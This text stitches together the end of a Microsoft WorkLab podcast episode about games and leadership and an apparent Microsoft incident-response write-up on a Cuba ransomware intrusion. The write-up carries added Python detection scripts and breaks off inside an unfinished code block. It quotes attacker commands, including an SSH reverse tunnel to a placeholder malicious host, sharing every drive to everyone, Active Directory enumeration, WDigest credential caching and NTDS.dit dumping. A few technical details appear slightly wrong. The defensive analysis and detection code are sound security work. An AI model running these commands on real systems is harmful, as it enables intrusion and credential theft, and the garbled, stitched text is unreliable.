SARAH BOND: Let’s give Overwatch as an example. Overwatch has different types of characters that you can play. It’s a team game, so you play as a team, but you pick a different type of character and the characters have different abilities. There’s some that have healing abilities or some that are really fast, you know, they have different weaponry that are associated with them. And when people first started playing Overwatch, they didn’t realize how much this mattered. But it turns out that a team has a better chance of winning if you have the right variety of characters adopted. Now, the game is built that way, that’s how they built it. They didn’t have to build it that way, but I appreciate they built it that way because that is a wonderful lesson for all of us as leaders—because that’s actually how the real world works. 

TONYA MOSLEY: Sounds like I’ve got to start playing more games. 

SARAH BOND: You never know what you might find out. 

TONYA MOSLEY: Sarah Bond, thank you so much for this conversation. 

SARAH BOND: Thank you. It was wonderful to connect. Thank you for having me. 

TONYA MOSLEY: Thanks again to Sarah Bond, corporate vice president of Xbox at Microsoft. And that’s it for this episode of the WorkLab podcast from Microsoft. Please subscribe and check back for the next episode of WorkLab, where I’ll be speaking with Versha Sharma, editor in chief of Teen Vogue, about the wants and needs of Gen Z employees entering the workforce. And please rate us, review, and follow us wherever you listen. It really helps us out. And if you’ve got a question, we’d love to hear from you. You can drop us an email at worklab@microsoft.com. And check out the WorkLab digital publication too, where you can find the latest Work Trend Index report, as well as a transcript of this episode. You can find everything at Microsoft.com/WorkLab. WorkLab is produced by Microsoft and Godfrey Dadich Partners and Reasonable Volume. I’m your host, Tonya Mosley. Our correspondents are Mary Melton and Desmond Dickerson. Sharon Kallander and Matthew Duncan produced this podcast. And Jessica Voelker is the WorkLab editor. Thank you for listening.


Defenders beware: A case for post-ransomware investigations

Ransomware is one of the most pervasive threats that the Microsoft Detection and Response Team (DART) responds to today. The groups behind these attacks continue to add sophistication to their tactics, techniques, and procedures (TTPs) as network security postures improve.

In this blog, we detail a recent ransomware incident in which the attacker used a collection of commodity tools and techniques, such as living-off-the-land binaries, to launch their malicious code. Cobalt Strike was used for persistence on the network with NT AUTHORITY\SYSTEM (local SYSTEM) privileges to maintain access to the network after password resets of compromised accounts.

This incident highlights an attacker’s ability to have a longstanding dwell time on a network before deploying ransomware. We will also discuss the various techniques used as well as the recommended detections and defense techniques that customers can use to increase protection against these types of attacks.

Microsoft recommends hunting proactively for pre-ransomware behaviors and hardening your network to prevent impact. Refer to https://aka.ms/ransomware-as-a-service for more information about defending against ransomware-related incidents.

What we found

Figure 1. Overall timeline of activities of the ransomware incident

Initial access

DART was unable to determine the initial entry vector of this attack due to the age of this compromise and limited retention of security solutions, along with encrypted devices being reimaged before analysis. The earliest observed activity showed the actor with domain administrator credentials.

Persistence

In DART’s post-ransomware investigation of this engagement, the team found multiple instances of scheduled tasks and services being created by the attacker for persistence after they had gained access to highly privileged credentials. Services and scheduled tasks have the option to run as NT AUTHORITY\System, allowing malicious code to run with highly privileged access. Because the actor created those tasks and services on a domain controller, the local SYSTEM access allowed them to easily access domain administrator accounts. The deployment of a backdoor to a domain controller can help an actor bypass common incident response recovery activity, such as resetting compromised accounts, in the hope of staying resident on the network.

Service: Cobalt Strike

Cobalt Strike was seen on a large scale across the network, on domain controllers, servers, and administrator workstations. The actor created Windows services to persist their payload: each service executed rundll32 to load the Cobalt Strike DLL by invoking the “AllocConsole” exported function of a variant of the Termite family of malware. These services were observed to execute with a combination of SYSTEM and domain administrator credentials. Termite malware is often used by crimeware groups to load Cobalt Strike while bypassing antivirus detections. Further information on the Termite malware family can be found in this blog: (Ex)Change of Pace: UNC2596 Observed Leveraging Vulnerabilities to Deploy Cuba Ransomware.

Figure 2. Example of the actor executing Cobalt Strike through rundll32.exe with system integrity

The Cobalt Strike DLLs were in C:\Windows\Temp and used a naming scheme based on the first and local octet of the command and control (C2). Once the actor installed Cobalt Strike on a domain controller, the malware was spread using a PowerShell script, which copied the DLL to C:\Windows\Temp via SMB, and then executed it through remote service creation.

Figure 3. Example of the threat actor copying Cobalt Strike through SMB

The actor elevated their permissions to “NT AUTHORITY\System” through service creation. This service creation was likely done through Cobalt Strike, using a pseudorandom service name, such as “4aedb00”.

Scheduled task: OpenSSH

The actor installed OpenSSH on the client’s network to maintain persistence on critical servers, including domain controllers and domain administrator workstations. The actor installed OpenSSH within C:\Windows\OpenSSH, rather than the standard OpenSSH path in System32.

The actor created a scheduled task for a persistent SSH connection to their C2 as “NT AUTHORITY\System”. The actor used TCP 443 for their SSH traffic rather than the standard TCP 22. In many organizations, TCP 22 outbound may be blocked, but as TCP 443 is needed for web traffic the port is often open. The actor also enabled port forwarding on TCP 7878 to allow the tunneling of malicious tools through the SSH connection.

The actor was also observed renaming ssh.exe to “C:\Windows\OpenSSH\svchost.exe” in a likely attempt to evade detection.

Figure 4. Example of the process masquerading to hide SSH usage

Four days after the actor deployed the ransomware, the actor returned to the compromised network through their existing OpenSSH persistence to install further persistence SSH services on additional domain controllers and domain administrator workstations.

The actor used OpenSSH’s sftp-server to transfer files between their C2 and the compromised host. The actor generated SSH keys on compromised hosts using ssh-keygen.exe, a tool that is part of the OpenSSH suite. This allowed the actor to SSH in using the keys rather than credentials, after credentials had been reset.

Lateral movement

Impacket (WMI)

Impacket’s WMI modules were used throughout the early stages of the compromise for remote execution and discovery. Impacket is an open-source collection of scripts for working with network protocols. This toolkit has recently been used by a large variety of crimeware groups for lateral movement and network discovery.

The actor used Impacket to execute PowerShell scripts out of “C:\Perflogs\”, which created .txt files within the same directory. All commands executed through Impacket output the results of the command to “\\127.0.0.1\ADMIN$\__1648051380.61”. The actor then deleted the PowerShell scripts and text files after execution.

Figure 5. Sample Impacket query with results being output into a file within the ADMIN$ directory

The actor also used Impacket to test if the destination server was able to ping the actor’s C2 before deploying Cobalt Strike to the device.

Figure 6. Actor testing the connectivity to their C2 through Impacket

PsExec

The actor used PsExec.exe to spread the ransomware on the victims’ network. The actor first executed “open.bat”, which executed “net share [C-Z]=[C-Z]:\ /grant:everyone,FULL”. This shared every drive on the host, granting access to everyone. “A.exe”, “Anet.exe”, and “Aus.exe” are all variants of the Cuba ransomware.

Figure 7. Command lines the actor executed through PsExec

Remote desktop protocol

While the attacker had access to lateral movement and remote code execution via Impacket and PsExec, the main method they used for lateral movement in this incident was Remote Desktop Protocol (RDP), which allowed them to use a GUI environment to change system settings and install malware. The actor used domain administrator accounts to RDP between devices.

Credential access

WDigest

The actor abused WDigest to cache credentials early in the compromise. This enabled the actor to gain access to domain administrator credentials.

WDigest is a Windows feature that, when enabled, caches credentials in clear text. This is often abused by credential access tools, such as Mimikatz. To detect whether WDigest caching has been enabled within your network, check the registry value HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential: it is set to 1 when caching is enabled. Caching can be disabled by setting the value to 0.

Figure 8. Example of the actor enabling WDigest

NTDSUtil Dumping

The actor obtained the Active Directory database (NTDS.dit) twice. On the first instance, the actor obtained the NTDS.dit five months into the compromise. Four days after the deployment of ransomware, the actor obtained the NTDS.dit a second time. The actor was able to create a copy of the NTDS.dit through the usage of the native tool ntdsutil.exe, copying the .dit to “C:\Windows\Temp\data\audit\Active Directory\ntds.dit”.

Figure 9. Actor command to obtain ntds.dit

Volume shadow copy access

The actor used a second method to obtain the Active Directory database: they used “vssadmin” to create a volume shadow copy of a domain controller. This technique creates a static copy of system files that a user would not typically be able to access while they are in use. Once the volume shadow copy was created, the actor copied the NTDS.dit, SYSTEM hive, and SECURITY hive to C:\Windows\, from where they could then copy them remotely through the ADMIN$ share.

Figure 10. Actor commands to create a volume shadow copy and copy the ntds.dit

Exfiltration

Compression

The actor was observed using 7-Zip to compress files before exfiltration. 7z.exe was executed out of C:\Windows\Temp. The actor did not include a password for the archive and used the device hostname as the name of the archive (for example: DC01.7z).

PSCP

The actor used PuTTY Secure Copy (PSCP) to remotely exfiltrate network shares to an actor-controlled C2. This version of PSCP had been renamed to “lsas.exe” in an attempt to masquerade as the legitimate “lsass.exe” process. PSCP was executed out of C:\Windows\Temp. The actor targeted staff- and finance-related resources.

Figure 11. Masqueraded PSCP to exfiltrate files

Defense evasion

Disabling antivirus

The actor disabled Microsoft Defender Antivirus on multiple devices after files had been quarantined by the antivirus. The actor turned off Microsoft Defender Antivirus through the Windows Security GUI application while connected via RDP to the device.

Figure 12. Microsoft Defender for Endpoint alert from the actor disabling real-time monitoring

Kernel driver

The actor used an Avast anti-rootkit driver. Unit 42 recently released a blog on how Cuba ransomware groups have used this driver to disable antivirus software before deploying the Cuba ransomware.

The actor installed the driver using the “sc” command, giving it kernel-level permissions. The actor then started the service with “sc start aswSP-ArPot2”. This service was used by the actor to disable the victims’ antivirus products with kernel privileges. Disabling antivirus products within the victim network ensured that the ransomware would spread without being quarantined or prevented.

Figure 13. Vulnerable driver being installed

The actor also created benign binaries to trigger the driver vulnerability. These binaries would iterate through a list of common antivirus executable names, providing each one to the control code 0x9988C094 and subsequently tasking the driver to kill those processes.

Discovery

The actor was observed executing generic system enumeration commands. While these commands are not malicious on their own, when seen together they can often indicate that an unauthorized user is enumerating the system.

The actor was seen executing the following commands:

  • whoami
  • ping 8.8.8.8
  • TASKLIST /v
  • sc queryex type=service state=all
  • wevtutil el
  • SYSTEMINFO
  • dsquery user -limit 100000
  • powershell  -command “Get-ADUser -Filter * -Properties * | Out-File C:\Windows\Temp\data\domain_user.txt -Append”
  • powershell  -command “Get-ADComputer -Filter * -Properties * | Out-File C:\Windows\Temp\data\domain_pc.txt -Append”
  • wmic  useraccount list full
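Because each of these commands is legitimate on its own, the useful detection is the cluster, not the individual command. The following script is an added example (not DART’s or Microsoft’s tooling) that flags a host when several distinct discovery commands from the list above run within a short window; the event field names and the sample telemetry are constructed.

```python
"""Flag hosts where several generic discovery commands run close together.

Added example for this write-up (not DART's own tooling). Input records are
constructed process-creation events shaped loosely like EDR telemetry;
field names and the sample data are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Patterns for the enumeration commands listed in the write-up. Each tuple is
# (label, regex over the full command line, matched case-insensitively).
DISCOVERY_PATTERNS = [
    ("whoami", r"^\s*whoami\b"),
    ("ping_external", r"^\s*ping\s+8\.8\.8\.8\b"),
    ("tasklist_verbose", r"^\s*tasklist\s+/v\b"),
    ("sc_query_all", r"^\s*sc\s+queryex\b.*state=all"),
    ("wevtutil_enum_logs", r"^\s*wevtutil\s+el\b"),
    ("systeminfo", r"^\s*systeminfo\b"),
    ("dsquery_users", r"^\s*dsquery\s+user\b"),
    ("get_aduser_dump", r"Get-ADUser\s+-Filter\s+\*"),
    ("get_adcomputer_dump", r"Get-ADComputer\s+-Filter\s+\*"),
    ("wmic_useraccount", r"^\s*wmic\s+useraccount\s+list\b"),
]
COMPILED = [(label, re.compile(rx, re.IGNORECASE)) for label, rx in DISCOVERY_PATTERNS]


def classify(command_line):
    """Return the discovery label matching a command line, or None."""
    for label, rx in COMPILED:
        if rx.search(command_line):
            return label
    return None


def find_discovery_bursts(events, window=timedelta(minutes=30), threshold=4):
    """Return {host: sorted labels} for hosts that ran at least `threshold`
    distinct discovery commands inside some window of length `window`.

    events: iterable of dicts with 'host', 'timestamp' (ISO 8601) and
    'command_line'. Single hits are ignored on purpose: the value of this
    detection is in the combination.
    """
    per_host = defaultdict(list)
    for ev in events:
        label = classify(ev["command_line"])
        if label:
            per_host[ev["host"]].append((datetime.fromisoformat(ev["timestamp"]), label))

    bursts = {}
    for host, hits in per_host.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            labels = {lab for ts, lab in hits[i:] if ts - start <= window}
            if len(labels) >= threshold:
                bursts[host] = sorted(labels)
                break
    return bursts


# Constructed sample telemetry: DC01 shows a burst of enumeration; WS07 runs
# two innocuous commands hours apart and must not be flagged.
SAMPLE_EVENTS = [
    {"host": "DC01", "timestamp": "2022-03-23T14:01:10", "command_line": "whoami"},
    {"host": "DC01", "timestamp": "2022-03-23T14:01:42", "command_line": "ping 8.8.8.8"},
    {"host": "DC01", "timestamp": "2022-03-23T14:03:05", "command_line": "TASKLIST /v"},
    {"host": "DC01", "timestamp": "2022-03-23T14:04:11", "command_line": "sc queryex type=service state=all"},
    {"host": "DC01", "timestamp": "2022-03-23T14:09:50",
     "command_line": 'powershell  -command "Get-ADUser -Filter * -Properties * | Out-File C:\\Windows\\Temp\\data\\domain_user.txt -Append"'},
    {"host": "WS07", "timestamp": "2022-03-23T09:15:00", "command_line": "whoami"},
    {"host": "WS07", "timestamp": "2022-03-23T17:15:00", "command_line": "SYSTEMINFO"},
]

if __name__ == "__main__":
    for host, labels in find_discovery_bursts(SAMPLE_EVENTS).items():
        print(f"{host}: {len(labels)} distinct discovery commands: {', '.join(labels)}")
```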

Recommended detection and defense strategies

As we observe more attacks using similar methods as described in this blog, organizations must ensure they follow security practices to defend their servers. The following is a list of recommendations for monitoring that organizations should implement as part of their detection strategy.

Service creation

Service creation events should be monitored for anomalous activity. A high-priority alert should be placed on administrator accounts creating services that execute as System. This is a common privilege escalation technique that can be used in a variety of ways, including having the service:

  1. Execute a malicious binary directly,
  2. Write to an actor-controlled named pipe, allowing the actor to steal an impersonation token,
  3. Execute a DLL through rundll32.exe

Figure 14. Instance of rundll32.exe executing Cobalt Strike with System integrity level

New service creations should be monitored for anomalous paths or executables. High priority alerts should be made for drivers located within those anomalous paths. While the driver was legitimately signed, the location can be a sign of malicious use. Examples of anomalous paths include but are not limited to:

  • C:\Temp\
  • C:\ProgramData\
  • C:\Windows\
  • C:\Windows\Temp\
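The following is an added example (not DART’s or Microsoft’s code) that scores service-install records against the patterns described in this section: binaries and drivers in the anomalous paths listed above, rundll32 loading a DLL, pseudorandom service names like “4aedb00”, and administrator accounts creating SYSTEM services. The records are constructed and loosely follow the fields of a Windows service-install event (System log Event ID 7045) plus the creating account; the exception for System32/SysWOW64/WinSxS under C:\Windows\ is an assumed refinement.

```python
"""Score Windows service-install records for the persistence patterns in
this write-up. Added example, not DART's or Microsoft's code. Records are
constructed and loosely follow the fields of a service-install event
(System log Event ID 7045) plus the account that created the service;
field names and sample values are assumptions.
"""
import re

# Paths the write-up lists as anomalous locations for a service binary or driver.
ANOMALOUS_PREFIXES = ("c:\\temp\\", "c:\\programdata\\", "c:\\windows\\temp\\", "c:\\windows\\")
# Legitimate system services live under these; treat them as exceptions to
# c:\windows\ (a refinement assumed here, not stated in the write-up).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
# Seven hex characters, like the "4aedb00" service name in the write-up (heuristic).
HEX_NAME = re.compile(r"^[0-9a-f]{7}$", re.IGNORECASE)
DLL_ARG = re.compile(r"([a-z]:\\[^\s,]+\.dll)")


def executable_of(image_path):
    """Return the program part of a service ImagePath, dropping arguments and
    surrounding quotes: '"C:\\x y\\a.exe" --svc' becomes 'C:\\x y\\a.exe'."""
    s = image_path.strip()
    if s.startswith('"'):
        return s[1:s.find('"', 1)]
    return s.split(" ", 1)[0]


def is_anomalous_path(path):
    p = path.lower()
    if p.startswith(SYSTEM_DIRS):
        return False
    return p.startswith(ANOMALOUS_PREFIXES)


def assess_service(record):
    """Return a list of (severity, reason) findings for one service record."""
    findings = []
    image = record["image_path"]
    exe = executable_of(image)
    args = image[len(exe):].lower()
    name = record["service_name"]

    if record["service_type"] == "kernel driver" and is_anomalous_path(exe):
        findings.append(("high", f"kernel driver loaded from anomalous path: {exe}"))
    elif is_anomalous_path(exe):
        findings.append(("medium", f"service binary in anomalous path: {exe}"))

    # With rundll32 as the service binary, the DLL it loads is what matters.
    if exe.lower().endswith("rundll32.exe"):
        m = DLL_ARG.search(args)
        dll = m.group(1) if m else "<unparsed>"
        severity = "high" if m and is_anomalous_path(dll) else "medium"
        findings.append((severity, f"rundll32 service loading DLL: {dll}"))

    if HEX_NAME.match(name):
        findings.append(("medium", f"pseudorandom service name: {name}"))

    # An interactive admin account creating a SYSTEM service is the case the
    # write-up recommends as a high-priority alert; machine accounts ($) and
    # SYSTEM itself are excluded to reduce installer noise.
    account = record["service_account"].lower()
    creator = record["created_by"].lower()
    if (account in ("localsystem", "nt authority\\system")
            and creator != "nt authority\\system" and not creator.endswith("$")):
        findings.append(("high", f"{record['created_by']} installed a SYSTEM service: {name}"))
    return findings


# Constructed records: a Cobalt Strike-style loader service, the anti-rootkit
# driver dropped into an anomalous path (file name made up), and a benign agent.
SAMPLE_RECORDS = [
    {"service_name": "4aedb00", "service_type": "win32",
     "image_path": "rundll32.exe C:\\Windows\\Temp\\payload.dll,AllocConsole",
     "service_account": "LocalSystem", "created_by": "CONTOSO\\da-admin"},
    {"service_name": "aswSP-ArPot2", "service_type": "kernel driver",
     "image_path": "C:\\ProgramData\\driver.sys",
     "service_account": "", "created_by": "CONTOSO\\da-admin"},
    {"service_name": "ContosoAgent", "service_type": "win32",
     "image_path": "\"C:\\Program Files\\Contoso\\agent.exe\" --service",
     "service_account": "LocalSystem", "created_by": "CONTOSO\\WS07$"},
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        for severity, reason in assess_service(rec):
            print(f"[{severity}] {rec['service_name']}: {reason}")
```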

Use of SSH

Microsoft recommends monitoring for unauthorized installations and usage of SSH in your network. SSH should not run as “NT AUTHORITY\System”.

In this incident, the actor used the following SSH command lines. Similar activity should be monitored within your environment:

ssh <organization>@<malicious IP address> -p 443 -i C:\ProgramData\ssh\id_ed25519 -R <malicious IP address>:10129:127.0.0.1:7878 -N -C -o IdentitiesOnly=yes -o StrictHostKeyChecking=no

The actor attempted to masquerade the SSH process as svchost.exe, so monitoring for the command on other process names may indicate process masquerading.
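As an added example (not Microsoft’s own detection), the script below anchors on the shape of the command line rather than the process name, so the renamed ssh.exe described above is still recognised, and then lists the reasons the event deserves attention: binary outside the standard OpenSSH folder, running as SYSTEM, non-standard port, reverse forward, host-key checking disabled. Event fields are assumptions and the sample values are constructed; 203.0.113.10 is a documentation address standing in for the actor’s C2.

```python
"""Flag SSH client invocations matching the persistence pattern in this
write-up. Added example, not Microsoft's own detection; event fields are
assumptions and sample values are constructed (203.0.113.10 is a
documentation address standing in for the actor's C2).
"""

STANDARD_OPENSSH_DIR = "c:\\windows\\system32\\openssh\\"
VALUE_OPTS = {"-p", "-i", "-R", "-L", "-D", "-o"}  # ssh options that take a value


def parse_ssh_args(command_line):
    """Split an OpenSSH-client style command line into {option: [values]},
    plus 'flags' (valueless switches such as -N, -C) and 'target' (user@host).
    Assumes unquoted arguments, as in the command line quoted in the write-up."""
    tokens = command_line.split()
    parsed = {"flags": set(), "target": None}
    i = 1  # tokens[0] is the program name, whatever it has been renamed to
    while i < len(tokens):
        tok = tokens[i]
        if tok in VALUE_OPTS and i + 1 < len(tokens):
            parsed.setdefault(tok, []).append(tokens[i + 1])
            i += 2
        elif tok.startswith("-"):
            parsed["flags"].add(tok)
            i += 1
        else:
            parsed["target"] = tok
            i += 1
    return parsed


def looks_like_ssh_client(parsed):
    """Anchor on the argument shape rather than the binary name, so a renamed
    ssh.exe is still recognised."""
    target = parsed["target"]
    return target is not None and "@" in target and any(o in parsed for o in VALUE_OPTS)


def assess_ssh_event(event):
    """Return the reasons a process event deserves attention (empty if none)."""
    parsed = parse_ssh_args(event["command_line"])
    if not looks_like_ssh_client(parsed):
        return []
    reasons = []
    image = event["image_path"].lower()
    exe = image.rsplit("\\", 1)[-1]
    options = [o.lower() for o in parsed.get("-o", [])]
    if exe != "ssh.exe":
        reasons.append(f"ssh-style command line under another process name: {exe}")
    if not image.startswith(STANDARD_OPENSSH_DIR):
        reasons.append(f"SSH binary outside the standard OpenSSH path: {event['image_path']}")
    if event["account"].lower() == "nt authority\\system":
        reasons.append("SSH client running as NT AUTHORITY\\SYSTEM")
    for port in parsed.get("-p", []):
        if port != "22":
            reasons.append(f"SSH to non-standard port {port}")
    for fwd in parsed.get("-R", []):
        reasons.append(f"reverse forward exposes a local port to the remote side: {fwd}")
    if "-N" in parsed["flags"]:
        reasons.append("no remote command (-N): tunnel-only session")
    if "stricthostkeychecking=no" in options:
        reasons.append("host key verification disabled")
    for key in parsed.get("-i", []):
        if key.lower().startswith(("c:\\programdata\\", "c:\\windows\\")):
            reasons.append(f"identity key stored outside a user profile: {key}")
    return reasons


# Constructed events: the actor's renamed ssh.exe from the write-up, a normal
# admin session, and an ordinary svchost.exe that must not be flagged.
ACTOR_EVENT = {
    "image_path": "C:\\Windows\\OpenSSH\\svchost.exe",
    "account": "NT AUTHORITY\\SYSTEM",
    "command_line": ("svchost.exe contoso@203.0.113.10 -p 443 -i C:\\ProgramData\\ssh\\id_ed25519 "
                     "-R 203.0.113.10:10129:127.0.0.1:7878 -N -C -o IdentitiesOnly=yes "
                     "-o StrictHostKeyChecking=no"),
}
LEGIT_EVENT = {
    "image_path": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
    "account": "CONTOSO\\jsmith",
    "command_line": "ssh.exe jsmith@jumpbox.contoso.local -p 22",
}
NOISE_EVENT = {
    "image_path": "C:\\Windows\\System32\\svchost.exe",
    "account": "NT AUTHORITY\\SYSTEM",
    "command_line": "svchost.exe -k netsvcs -p",
}

if __name__ == "__main__":
    for ev in (ACTOR_EVENT, LEGIT_EVENT, NOISE_EVENT):
        print(ev["image_path"], "->", assess_ssh_event(ev) or "no findings")
```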

Copying to remote share

Microsoft recommends monitoring for the command prompt accessing remote shares. This was a common technique used by the actor for transferring files throughout the network.

Figure 15. The actor copying Cobalt Strike via SMB

Microsoft Defender for Endpoint will create an alert when the command prompt accesses remote shares. This includes the Impacket usage where the command targets the localhost ADMIN$ share. Monitoring these alerts within your network can help detect unauthorized access.

Figure 16. Sample alert in Defender for Endpoint when a command prompt accesses a remote share

PsExec

Networks should monitor for unauthorized usage of PsExec. Suggested detection techniques include:

  1. Existence or execution of the binary: PsExec.exe
  2. Existence or execution of the service binary: PsExeSvc.exe
  3. Service creation named PsExeSvc
  4. Named Pipes created with the name PsExeSvc

The techniques that PsExec uses can easily be replicated, either through living-off-the-land tools or through a custom toolset using the Windows API. Monitoring for each stage of PsExec can help detect unauthorized variants within your network. PsExec works in three stages:

  1. SMB connection to ADMIN$ on the destination device, copying the binary “PSEXESVC” to the Windows directory.
  2. Remote connection to RPC (port 135) on the destination device, creating a service to execute the binary.
  3. Creation of the named pipe \\.\pipe\PSEXESVC for remote communication between host and destination.

Figure 17. Diagram describing how PsExec works

Monitoring executable files being written to administrative shares may help detect attempts at lateral movement. This can include monitoring for native command lines, such as copy, targeting remote shares as mentioned above. Defender for Endpoint can be used to monitor file creation events via Server Message Block (SMB) through DeviceFileEvents. The executable file will be created by the ntoskrnl.exe process, which is the kernel process that manages SMB, and the ShareName column will be ADMIN$.

Figure 18. Example of PsExeSvc.exe being created via Server Message Block (SMB) in Defender for Endpoint

Anomalous remote connections to RPC (Port 135) should be monitored within the network, as this can be used by a process to remotely create and start a service. The summarize and sort operators within Defender for Endpoint’s Advanced Hunting can help detect uncommon connections on Port 135. The following KQL can help build a basis for identifying anomalous connections:

DeviceNetworkEvents
| where RemotePort == 135
| summarize count() by InitiatingProcessFileName
| sort by count_ asc

Figure 19. Image showing PsExec.exe connecting to a remote host on port 135

This technique can also be replicated through remote service creation using named pipes. An actor can remotely connect to the IPC$ share and open the named pipe svcctl to remotely create a service. This would contain similar detections, except the traffic will be over port 445 to the IPC$ share.

On the destination end, the RPC connection will result in the creation of a service. Monitoring for unauthorized service creation can be done through capturing the 4679 event in the System event log.

Figure 20. Service creation event in Defender for Endpoint

Remote named pipe communication can be monitored through the creation of the named pipe on the destination server. PsExeSvc.exe will create a named pipe called PSEXESVC, which the host device can connect to through the IPC$ share. As the host device connection is through SMB, the ntoskrnl.exe process will connect to the named pipe as a client.

Figure 21. Remote SMB named pipe communications for PsExec
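The three-stage description above and the port 135 rarity query are combined in the following added Python example (not code from the Microsoft post). It correlates, on the destination host, an executable written to ADMIN$ by ntoskrnl.exe with a later service whose image is that file and a named pipe opened by the resulting process, so that a renamed or custom PsExec variant is caught by structure rather than by the PSEXESVC name; a second function reproduces the summarize-and-sort count of processes connecting to remote port 135. All events are constructed, and the field names (kind, share, initiating_process, image_path, pipe_name, remote_port) are assumptions, not the Defender for Endpoint schema.

```python
"""Added example (not from the Microsoft post): correlate the three PsExec stages
the section describes on the destination host, so that renamed or custom
variants are caught structurally rather than by the PSEXESVC name, plus the
rarity count the post's KQL performs for port 135. All events are constructed
and the field names are assumptions, not a real product schema."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)


def correlate_psexec_like(events):
    """Find executables written to ADMIN$ over SMB that are then run as a service
    and open a named pipe within WINDOW on the same device."""
    by_device = defaultdict(list)
    for ev in events:
        by_device[ev["device"]].append(ev)
    findings = []
    for device, evs in by_device.items():
        evs.sort(key=lambda e: e["ts"])
        for f in evs:
            # Stage 1: file created through SMB (ntoskrnl.exe is the creating process) on ADMIN$.
            if (f["kind"] != "file" or f["share"] != "ADMIN$"
                    or f["initiating_process"].lower() != "ntoskrnl.exe"
                    or not f["file_name"].lower().endswith(".exe")):
                continue
            name = f["file_name"].lower()
            later = [e for e in evs if f["ts"] <= e["ts"] <= f["ts"] + WINDOW]
            # Stage 2: a service whose image path ends in that file name.
            svc = next((e for e in later if e["kind"] == "service"
                        and e["image_path"].lower().endswith("\\" + name)), None)
            # Stage 3: a named pipe created by the process started from that file.
            pipe = next((e for e in later if e["kind"] == "pipe"
                         and e["initiating_process"].lower() == name), None)
            stages = ["smb_copy_to_admin_share"]
            stages += ["service_created"] if svc else []
            stages += ["named_pipe_created"] if pipe else []
            if len(stages) >= 2:
                findings.append({"device": device, "binary": f["file_name"],
                                 "remote_ip": f["remote_ip"], "stages": stages,
                                 "stock_psexec": name == "psexesvc.exe"})
    return findings


def rare_rpc_initiators(network_events):
    """Processes connecting to remote port 135, least common first (the post's KQL)."""
    counts = Counter(e["initiating_process"] for e in network_events if e["remote_port"] == 135)
    return sorted(counts.items(), key=lambda kv: (kv[1], kv[0]))


def _t(minute):
    return datetime(2022, 10, 1, 12, minute)


# Constructed destination-host events. SRV1 sees stock PsExec, SRV2 a renamed
# variant, SRV3 only a file copied to ADMIN$ with no service (not reported).
SAMPLE_EVENTS = [
    {"device": "SRV1", "ts": _t(0), "kind": "file", "share": "ADMIN$", "file_name": "PSEXESVC.exe",
     "initiating_process": "ntoskrnl.exe", "remote_ip": "10.0.0.5"},
    {"device": "SRV1", "ts": _t(0), "kind": "service", "service_name": "PSEXESVC",
     "image_path": "C:\\Windows\\PSEXESVC.exe"},
    {"device": "SRV1", "ts": _t(1), "kind": "pipe", "pipe_name": "\\\\.\\pipe\\PSEXESVC",
     "initiating_process": "PSEXESVC.exe"},
    {"device": "SRV2", "ts": _t(10), "kind": "file", "share": "ADMIN$", "file_name": "winupd.exe",
     "initiating_process": "ntoskrnl.exe", "remote_ip": "10.0.0.5"},
    {"device": "SRV2", "ts": _t(11), "kind": "service", "service_name": "WinUpd",
     "image_path": "C:\\Windows\\winupd.exe"},
    {"device": "SRV2", "ts": _t(11), "kind": "pipe", "pipe_name": "\\\\.\\pipe\\wuc",
     "initiating_process": "winupd.exe"},
    {"device": "SRV3", "ts": _t(20), "kind": "file", "share": "ADMIN$", "file_name": "tool.exe",
     "initiating_process": "ntoskrnl.exe", "remote_ip": "10.0.0.9"},
]
SAMPLE_NETWORK = [
    {"initiating_process": "svchost.exe", "remote_port": 135},
    {"initiating_process": "svchost.exe", "remote_port": 135},
    {"initiating_process": "svchost.exe", "remote_port": 135},
    {"initiating_process": "PsExec.exe", "remote_port": 135},
    {"initiating_process": "chrome.exe", "remote_port": 443},
]

if __name__ == "__main__":
    for finding in correlate_psexec_like(SAMPLE_EVENTS):
        print(finding)
    print(rare_rpc_initiators(SAMPLE_NETWORK))
```

Requiring at least two of the three stages keeps a lone administrator copying a tool to ADMIN$ out of the alert queue while still surfacing variants that rename the binary, the service and the pipe.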

NTDS.dit dumping

Monitor usage of ntdsutil for malicious instances in which actors attempt to obtain NTDS.dit. The command in the NTDS.dit dumping section shows how the actor used this tool to create a copy of NTDS.dit. This command can be monitored, with the path being the only variable that will change. There are limited legitimate reasons to create a full NTDS.dit copy.

Figure 22. Defender for Endpoint alert from ntds.dit dump

Defender for Endpoint alerts on the dumping of the NTDS.dit, and these alerts should be responded to with high priority. Monitoring for the unauthorized usage of the “ntdsutil” tool is strongly encouraged as well.

If your network has file monitoring enabled, alerting on the creation of new .dit files can also help detect potential NTDS.dit dumping. The actor was observed copying the NTDS.dit out of a volume shadow copy.

Figure 23. Example command copying NTDS.dit from a volume shadow copy

Antivirus tampering

Organizations should monitor and respond to antivirus and endpoint detection and response (EDR) alerts where antivirus has been disabled or tampered with. Wherever possible, anti-tampering settings should be enabled to prevent actors from being able to interact with and disable antivirus software. For more information about Defender for Endpoint tamper protection, visit our docs page: Protect security settings with tamper protection.

Microsoft Defender Antivirus provides event logging on attempted tampering with the product. This can include the disabling of services such as real-time protection (Event ID 5001). An alert will also be created within the Defender for Endpoint portal, where customers have the ability to further triage the alert through the advanced hunting interface. Monitoring for usage of the Windows PowerShell cmdlet can also help discover instances of antivirus tampering.

Figure 24. Sample command to look for antivirus tampering

Remote desktop protocol

DART was able to detect the actor's RDP connections by looking for anomalous connections. These anomalous connections include:

  • Domain administrators logging into multiple servers for the first time, and
  • Domain administrators initiating RDP connections from abnormal locations.

Domain and enterprise administrator logons should be audited for anomalous connections, including connections originating from edge servers or onto servers that they do not usually administrate. Multifactor authentication (MFA) should be enforced for administrator accounts.
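The following added Python example (not code from the Microsoft post) shows the two RDP anomalies listed above as a baseline-and-compare check: it learns, per privileged account, which servers are normally reached over RDP and from which source hosts, then flags new logons to never-before-seen servers (with an extra note when several first-time servers appear in one batch), logons from an unseen source, and logons originating on an edge server. The logon records, host names, group names and the EDGE_HOSTS list are constructed assumptions; logon type 10 is Windows' RemoteInteractive (RDP) logon type.

```python
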